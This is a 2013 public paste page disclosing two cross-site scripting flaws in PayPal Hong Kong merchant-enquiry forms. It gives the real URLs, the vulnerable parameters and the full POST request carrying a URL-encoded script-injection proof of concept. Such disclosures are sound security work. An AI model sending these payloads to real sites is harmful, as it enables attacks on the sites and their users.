Don't like ads? PRO users don't see any ads ;-)
Public Pastes

Paypal xss vulnerability

By: BreakTheSec on Feb 16th, 2013  |  syntax: None  |  size: 2.82 KB  |  hits: 368  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. Number of Vulnerabilities : 2
  2. ___________________________________________________________________________________________    
  3. --- Vulnerability # No-  1:
  4. ___________________________________________________________________________________________
  5. +URL:  https://www.paypal-marketing.com.hk/merchant-enquiries/index.php
  6. +Vulnerability Type:  Cross Site Scripting (XSS)
  7. + Form Action : POST
  8. +POST Data Sent to Produce the Bug :
  9.  
  10. token=1359557986&from_page=en&company_name=%22%3E%3Cscript%3Eprompt%281%29%3C%2Fscript%3E&business_type_other=vulnerable_field&business_need_other=vulnerable_field&contact_person=vulnerable_field&contact_person2=vulnerable_field&phone=vulnerable_field&phone2=vulnerable_field&email=vulnerable_field&email2=vulnerable_field&business_type=1
  11.  
  12. --Here, the field name with field value vulnerable_field are all vulnerable to cross site scripting .
  13.  
  14. And, the filed name (company_name)  with value %22%3E%3Cscript%3Eprompt%281%29%3C%2Fscript%3E is also vulnerable and used here to produce the XSS bug here .
  15. +POST Parameters that cause XSS Vulnerability in this Page :
  16. company_name , business_type_other,business_need_other, contact_person ,contact_person2, phone,phone2, email,email2
  17.  
  18. +How to fix :
  19. -- Though this page uses a java script function to validate this form, but it fails to sanitize the all characters which could allow hackers or pen testers to  return malicious on webpage like Cross Site Scripting attack   
  20.  
  21. ___________________________________________________________________________________________
  22. Vulnerability No. #  2 :
  23. ___________________________________________________________________________________________
  24. +URL:  https://www.paypal-marketing.com.hk/merchant-enquiries/index-zh.php
  25. +Vulnerability Type:  Cross Site Scripting (XSS)
  26. + Form Action : POST
  27. +POST Data Sent to Produce the Bug :
  28.  
  29. token=1359557986&from_page=en&company_name=%22%3E%3Cscript%3Eprompt%281%29%3C%2Fscript%3E&business_type_other=vulnerable_field&business_need_other=vulnerable_field&contact_person=vulnerable_field&contact_person2=vulnerable_field&phone=vulnerable_field&phone2=vulnerable_field&email=vulnerable_field&email2=vulnerable_field&business_type=1
  30.  
  31. --Here, the field name with field value vulnerable_field are all vulnerable to cross site scripting .
  32.  
  33. And, the filed name (company_name)  with value %22%3E%3Cscript%3Eprompt%281%29%3C%2Fscript%3E is also vulnerable and used here to produce the XSS bug here .
  34. +POST Parameters that cause XSS Vulnerability in this Page :
  35. company_name , business_type_other,business_need_other, contact_person ,contact_person2, phone,phone2, email,email2
  36.  
  37. +How to fix :
  38. -- Though this page uses a java script function to validate this form, but it fails to sanitize the all characters which could allow hackers or pen testers to  return malicious on webpage like Cross Site Scripting attack
create a new version of this paste RAW Paste Data